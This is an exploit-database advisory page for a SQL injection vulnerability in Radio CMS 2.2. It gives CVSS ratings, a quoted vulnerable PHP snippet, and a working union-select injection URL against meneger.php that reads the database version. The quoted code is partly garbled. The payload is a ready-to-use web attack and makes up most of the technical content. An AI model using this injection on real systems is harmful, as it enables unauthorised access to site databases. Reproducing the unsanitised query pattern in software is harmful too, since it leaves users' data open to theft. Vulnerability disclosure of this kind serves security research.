Radio CMS 2.2 SQL Injection

2013-04-05 / 2013-05-17
Credit: Rooster(XEKA)
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################# + + Title: RadioCMS 2.2 + Author: Rooster(XEKA) + Greetz to: Isis,luz3r,slider + Contact: forum.xeksec.com + ################################################# --[ Vuln Code ] -- ... if ($_GET['playlist_id']) { $playlist_id_get = ['playlist_id']; } ... if ($playlist_id != "") { $query = "SELECT * FROM `playlist` WHERE $playlist_id;"; ... ################################################ --[ Exploitable ]-- http://localhost/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12 ################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top